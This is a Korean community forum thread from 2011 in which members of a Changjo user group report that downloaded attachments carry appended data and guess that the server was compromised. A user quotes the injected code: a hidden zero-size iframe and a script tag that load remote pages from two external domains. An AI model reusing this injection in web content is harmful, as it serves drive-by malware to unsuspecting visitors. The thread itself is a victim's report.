창조유저그룹-커즈닷컴
Window close
ID :     PASS :   
   
  처음으로
  창조
  창조 소개
창조 다운로드
CUGz.com 소개
온라인 도움말
  커뮤니티
  가입인사
자유게시판
Q/A게시판
TIP/TECH
열린강좌
자주하는질문
아이디어게시판
  자료실
  소스자료실
프로그램자료실
기타자료실
명예의 전당
이미지 자료실
  지원/기타
  표준용어재정
구글 웹서치  
관리자 전용


LIST ALL
Posted by 박종훈2011-01-06 21:11:34, Hit : 15993
첨부파일에 악성코드가 붙어요.
Homepage : http://qnrdlqkrwhdgns.canxan.com/
Post URL : http://cugz.sjworks.net/bbs/zboard.php?id=freeboard&no=4563
첨부파일 다운로드를 하면 파일 끝에 이상한 데이터가 딸려옵니다.
아래와 같은 데이터가 딸려옵니다.

<?ob_start();?><iframe src="http://www.ro521.com/test.htm" width=0 height=0></iframe><?ob_start();?><script src="http://j5b.kr/bin/h.js"></script>

손상진   2011-01-06 PM 9:28:25  
어떤 문서의 첨부파일에서 그러는지 알려주시면 조치하겠습니다.
박종훈   2011-01-06 PM 10:53:47  
전부 그러는것 같습니다. 모든 첨부파일의 끝부분에 저런 데이터가 붙습니다.
소스자료실에서 zip 파일을 받아도 그렇고, 이미지 자료실에서 이미지를 받아도 전부다 파일 끝에 저런 이상한 데이터가 붙습니다^^
박종훈   2011-01-06 PM 11:02:22  
어라.. 이상하네요-_-
최근에 올라온 글에는 끝에 이상한 데이터가 안 붙네요;;

http://cugz.sjworks.net/bbs/zboard.php?id=pds_prog&no=667
http://cugz.sjworks.net/bbs/view.php?id=pds_img&no=185
http://cugz.sjworks.net/bbs/zboard.php?id=pds_sc&no=818

위 게시물의 첨부파일에는 이상한 데이터가 안붙습니다.
그런데
1: http://cugz.sjworks.net/bbs/zboard.php?id=pds_sc&no=817
위 게시물에는 붙습니다.

2: http://cugz.sjworks.net/bbs/zboard.php?id=pds_sc&no=815
위 게시물에도 이상한 데이터가 붙는데, 값이 조금 다릅니다.

1번 링크의 게시물의 첨부파일과 2번 링크의 게시물의 첨부파일에 이상한 데이터가 붙는데 데이터의 값이 다릅니다.

download.php 파일에 문제가 있어서 끝에 이상한 데이터가 붙는줄 알았는데, 그게 아닌가 봐요....악성코드가 실제 파일을 건드린건가-_-;
한수훈   2011-01-07 PM 6:27:58  
악성 사이트인것 같네요 ;; 해당 주소가
지상현   2011-01-08 AM 11:53:15  
음... 무섭네요. 악성코드...
박종훈   2011-01-08 PM 1:46:56  
처음에는 download.php 파일에 문제가 있어서 끝에 데이터가 붙는줄 알았는데.. 그게 아닌것 같아요.
최근 파일에는 이상한 데이터가 안붙고 예전 파일들에는 이상한 데이터가 붙네요..
악성코드가 파일까지 건드린건가요?
지상현   2011-01-08 PM 5:24:22  
업로드하면 일단 임시 폴더에 파일을 만들고, php에서는 그 파일을 이동하거나 삭제할 수 있는 수준으로 접근할 수 있는 걸로 아는데...
그때 (옮기고 나서) 파일을 건드렸을 수도 있겠네요.

아니면 이게 악성 코드를 실행하기 위한 과정 중 생긴 부산물 비슷한 걸수도 있겠구요...
박종훈   2011-01-10 PM 6:23:04  
그나저나, 파일까지 건드렸다면.. 좀 심각한거 같습니다-_-
LIST ALL               GO TO THE TOP


N
C
   Subject
Posted by
Date
H
3771
   cugz가 오염된건지 누가 해킹한건지... [5]
지상현 2010/12/21  4919
3770
   이희창님 계신가요?
조경수[kingpc] 2010/12/17  4492
3769
   곧 윈도우 8 공개한다는 소식이 있던데... [1]
신용주 2010/12/14  4697
3768
   마소 백신마져 창조를 바이러스로 정의 하네요.. ;; [5]
박재성 2010/12/06  4958
3767
   안녕하세요 ㅎㅎ [2]
이진성 2010/11/10  4439
3766
   서버 이야기가 나와서... [4]
손상진 2010/09/21  4432
3765
   수훈님이 대리하는 서버 파워가 250w 라 함은.. [5]
박재성 2010/09/21  4038
3764
   한수훈님이 거짓말을 하고 계신거 같은데.. [3]
박재성 2010/09/21  5011
3763
   요즘.... 초등학교 자원 봉사중... [4]
신용주 2010/09/17  4510
3762
   저도 오랜만에 글 남깁니다ㅋ [4]
김동민 2010/09/02  4483
3761
   오랜만에 글 남겨보네요 [2]
지상현 2010/08/27  4680
3760
   워드 자격증 따야하는데... [5]
신용주 2010/08/17  4458
3759
   키보드에 장난질좀 쳐봤습니다. [6]
손상진 2010/08/17  4969
3758
   제가 요즘 RC에 빠져버렸습니다.. [2]
권선중 2010/08/12  4411
3757
   안마방의 실태[펌] [1]
권선중 2010/08/11  5278
3756
   음.. 최근 가입자..
제인호[독도] 2010/08/04  4337
3755
   요즘들어 키보드 꾸밈신(?)이 오시네요... [11]
손상진 2010/08/03  5032
3754
   네이버 워드... [3]
신용주 2010/08/03  4636
3753
   음.. 승우님 반성을 하고..있으시겠죠
제인호[독도] 2010/08/02  4607
3752
   체인호님께서 올리신글보고 해당 사이트를 다녀오고서.. [2]
권선중 2010/07/30  4573
3751
   플레이어 제작 또다시 침체기 ㅠㅠ
권선중 2010/07/30  4627
3750
   승우님 그러지마시라구요 ㅋㅋㅋ [11]
제인호[독도] 2010/07/30  4466
3749
   웹표준이란 무었을까요? [7]
권선중 2010/07/28  4425
3748
   MP ID와 아트앨범만이라도 외부 DLL로 읽어올수없을까요..? [1]
권선중 2010/07/26  4460
3747
   익스 9가 나온다네요... [15]
권선중 2010/07/25  4272
LIST ALL   Prev [1][2][3][4][5] 6 [7][8][9][10]..[156] Next
Copyright 1999-2024 Zeroboard / skin by reedyfox in miniwini style
로그인
지우개 Expert 3.0
제작자 : 천호성 님 [LINK]
로그인
대박로또2005
제작자 : 최재일 님 [LINK]
로그인
1박종훈15292 점
2지상현8809 점
3손상진7388 점
4권선중6060 점
5이진백5174 점
로그인
가입일닉네임
05/31김동률
03/31홍형기
09/01o00pp99oo
12/27이재민
11/20이희철
로그인